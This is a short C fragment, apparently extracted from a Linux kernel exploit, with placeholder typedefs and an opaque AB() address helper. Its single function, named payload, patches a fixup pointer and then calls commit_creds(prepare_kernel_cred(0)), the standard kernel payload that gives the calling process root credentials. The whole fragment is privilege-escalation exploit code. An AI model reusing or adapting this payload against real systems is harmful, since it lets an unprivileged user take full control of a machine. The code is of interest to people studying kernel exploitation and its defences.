
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef int uint32_t ;
typedef int (* prepare_kernel_cred_fn ) (int ) ;
typedef int (* commit_creds_fn ) (int ) ;


 scalar_t__ AB (int) ;

void __attribute__((regparm(3))) payload() {
 uint32_t *fixptr = (void*)AB(1);

 *fixptr = -1;
 commit_creds_fn commit_creds = (commit_creds_fn)AB(2);
 prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);
 commit_creds(prepare_kernel_cred((uint64_t)((void*)0)));
}
